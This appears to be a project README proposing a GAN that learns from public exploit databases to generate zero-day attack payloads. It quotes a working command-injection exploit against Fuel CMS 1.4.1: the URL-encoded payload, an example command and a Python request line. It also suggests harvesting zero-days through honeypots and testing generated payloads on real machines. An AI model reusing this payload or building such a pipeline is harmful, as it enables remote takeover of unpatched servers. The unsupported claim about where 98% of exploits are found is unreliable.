Is it possible for an AI (a GAN, Generative Adversarial Network) to generate exploit code automatically?
I have been taking the courses at https://tryhackme.com/. They are good and I recommend them, but you are not going to hack any real environment with them. (Nobody is going to break into a website whose administrators know how to press the update button.) We have extensive experience with neural networks.
To hack real environments you need a zero-day exploit, which you can obtain in two ways:
- Through a honeypot: create a deliberately vulnerable environment, wait for a MASTER hacker to show up and attack it, capture the attack code there, and take the zero-day.
- Know a lot and find the vulnerability yourself (everybody will die doing low-level reverse engineering before finding it).
Can you feed a TensorFlow GAN with previously known exploit code and have the GAN end up generating zero-day exploits?
Note: in this project the word AI will not be used again. It is a marketing word; when programming IT MEANS NOTHING. Every time a programmer says AI instead of Reinforcement Learning, TensorFlow, PyTorch or Decision Tree, a kitten dies XD
A GAN (in this tutorial a DCGAN, Deep Convolutional Generative Adversarial Network) trains two models simultaneously through an adversarial process. The Generator ("the artist") learns to create images that look real, while the Discriminator ("the art critic") learns to tell real images from fake ones. More info: https://www.tensorflow.org/tutorials/generative/dcgan
Example: the GAN is fed with anime faces (an image matrix 360 wide, 360 high, with 3 color channels) and after several rounds it ends up generating images of "invented" anime characters, that is, ones that were not drawn by any human. Why not do the same with an n x n exploit matrix?
For more details on GAN technology, see the example of creating images of a hybrid animal between horses and zebras.
Remember that although the examples use images, for the GAN an image (a matrix 360 wide, 360 high, with 3 color channels) and Python code (a tokenized matrix of N tokens for N code files) are the same thing: a data array. It is true that, to be turned into a GAN matrix, an image is treated differently from a text in German or from Python code. Reinforcement Learning could also do it, but it does not reach the creativity levels of the GAN.
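A minimal sketch of the "same data array" idea, using harmless snippets. It assumes a naive whitespace split as a stand-in tokenizer, and `build_vocab` and `to_matrix` are hypothetical helper names, not part of any library. It turns N short code snippets into an N x width integer matrix, the text counterpart of an image's height x width x 3 array.

```python
def build_vocab(token_lists):
    """Assign an integer id to every distinct token; 0 is reserved for padding."""
    vocab = {"<pad>": 0}
    for tokens in token_lists:
        for tok in tokens:
            vocab.setdefault(tok, len(vocab))
    return vocab


def to_matrix(snippets, width):
    """Hypothetical helper: encode each snippet as a fixed-width row of ids."""
    # Naive whitespace tokenizer (an assumption made for this sketch only).
    token_lists = [s.split() for s in snippets]
    vocab = build_vocab(token_lists)
    rows = []
    for tokens in token_lists:
        ids = [vocab[t] for t in tokens][:width]  # truncate long snippets
        ids += [0] * (width - len(ids))           # pad short ones with 0
        rows.append(ids)
    return rows, vocab


snippets = ["x = 1", "print ( x )", "y = x + 1"]
matrix, vocab = to_matrix(snippets, width=6)
for row in matrix:
    print(row)
```

Every row has the same length, so the result is a rectangular array that a network can consume, just as it would consume pixel values.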
An exploit is a piece of code, or a set of them, that lets you take advantage of an "extra function" of the attacked server. The attacked server is not aware of this extra function, which was created unintentionally during the server's development.
Here we can see a good example of an exploit, https://www.exploit-db.com/exploits/50477, which targets servers running Fuel CMS v1.4.1 (https://www.getfuelcms.com/).
- A search request is made to http.serveratack.com/fuel/pages/select/?filter
- The payload is appended after it
%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b %24%61%28%27
- After the payload comes a cmd console command, for example simply listing the files on the server
dir /l
- It ends with the closing part of the payload
%27%29%2b%27
The server will then return the list of files, or the output of any other cmd instruction; the machine is totally hacked.
The python code looks like this:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
From this explanation and from https://www.exploit-db.com/exploits/50477 it follows that the interesting part is the payload. The rest of the code is auxiliary Python; in fact it could just as well be written in Java or C#. The main idea is to create a GAN that finds payloads.
To create AI images of horses that look like zebras we need a large dataset of images of zebras and horses.
To create the payload you need to collect all the Python exploits (the first versions will use only Python; keep in mind that more languages will be added later). 98% of known exploits are found on these sites:
- https://www.exploit-db.com/ Exploit Database, a public archive of exploits and proof-of-concept code maintained by OffSec
- https://nvd.nist.gov/vuln/full-listing US National Vulnerability Database (NIST)
- https://www.tenable.com/products/nessus Nessus vulnerability scanner, free or paid version
- https://www.rapid7.com/db Vulnerability & Exploit Database (used in Metasploit https://docs.rapid7.com/metasploit/managing-the-database/ )
- https://github.com/ can be searched by keywords such as "POC", "vulnerability" or "cve"
For the Python exploit code to enter the GAN, tokenization (transformation into a matrix) is required. Each language requires its own tokenization system: English, French... (more information on what tokenization is: https://www.tensorflow.org/text/guide/tokenizers )
You can play with tokenizing the way ChatGPT does here: https://platform.openai.com/tokenizer
Programming languages require their own tokenization mode. These libraries and articles can help with tokenizing Python source:
- https://benjam.info/blog/posts/2019-09-18-python-deep-dive-tokenizer/ (reading it in full is recommended)
- https://docs.python.org/3/library/tokenize.html https://documentation.help/Python-3.6.8/tokenize.html
- https://pypi.org/project/code-tokenize/
- https://github.com/huggingface/tokenizers/tree/main?tab=readme-ov-file#bindings
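As an illustration of the standard-library option listed above, here is a minimal sketch that uses Python's `tokenize` module on a harmless one-line program. The helper name `python_tokens` is hypothetical, and dropping the layout-only tokens is a choice made for this sketch, not a requirement of the module.

```python
import io
import tokenize


def python_tokens(source):
    """Return (token_type_name, token_string) pairs for Python source text."""
    result = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        # Skip layout-only tokens so the sequence holds just the code itself.
        if tok.type in (tokenize.NEWLINE, tokenize.NL, tokenize.ENDMARKER):
            continue
        result.append((tokenize.tok_name[tok.type], tok.string))
    return result


tokens = python_tokens("total = price * 2\n")
for kind, text in tokens:
    print(kind, text)
```

Unlike a natural-language tokenizer, this one knows Python's grammar, so names, operators, numbers and string literals come out as separate, typed tokens.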
The Generator ("the artist") must generate .py code and correct it based on the score returned by the Discriminator ("the art critic"). The Discriminator should answer the question: how close is this to being a viable payload?
To really check it, a real machine to attack would be required. This environment is complex; generating around 5000 .py files with potential attacks is enough, and those then have to be checked against the real machine. The Discriminator must be able to verify that the code compiles and is able to reach the target. Training should focus on creating payloads. It would help a lot to understand the steps that the programmer-hacker took to discover the exploit.
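The "code compiles" part of that check can be sketched with Python's built-in `compile`, which parses source text without executing it. The function name `compiles` is hypothetical, and this covers only syntax; whether generated code reaches a target is a separate question that this sketch does not address.

```python
def compiles(source):
    """Return True if the text parses as valid Python; nothing is executed."""
    try:
        compile(source, "<generated>", "exec")
        return True
    except (SyntaxError, ValueError):
        # SyntaxError: malformed code. ValueError: e.g. null bytes on some versions.
        return False


print(compiles("x = 1\n"))
print(compiles("x = = 1\n"))
```

A cheap filter like this could discard syntactically invalid candidates before any more expensive evaluation.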
*feel free to suggest changes*
- Collect the .py files from the exploit databases.
- Tokenize the contents of each .py. The code is one thing and the payload is another; each needs its own way of becoming a matrix.
- Generation of two Discriminators (art critics). One neural network must answer the question "how close is this .py to being viable code?" and the other "how close is this payload to being a viable payload?" The kind of payload is highly important: https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/payload-types
- Creation of the Generator (the artist). It should generate code and payloads from random input, weighted by the Discriminator (like the anime images, but with code).
- Evaluation: creation of real virtualized environments for testing the generated payloads. This tool will generate around 100000 payloads, of which only one will work. The one that works XD
We are currently developing privately; if you want to join the team, please contact us: https://www.linkedin.com/in/luislcastillo/
The name is a curious tribute to Argentina 🇦🇷 🌞. Sue Carpenter is the nurse who took Diego Maradona off the field at the 1994 USA soccer World Cup ⚽ (Foxboro Stadium, Massachusetts, June 25, Argentina beat Nigeria 2-1). Sue was the only person who could stop Diego; no other soccer player in history could stop him. "The tool that kills the God of soccer". After that he never played for Argentina again.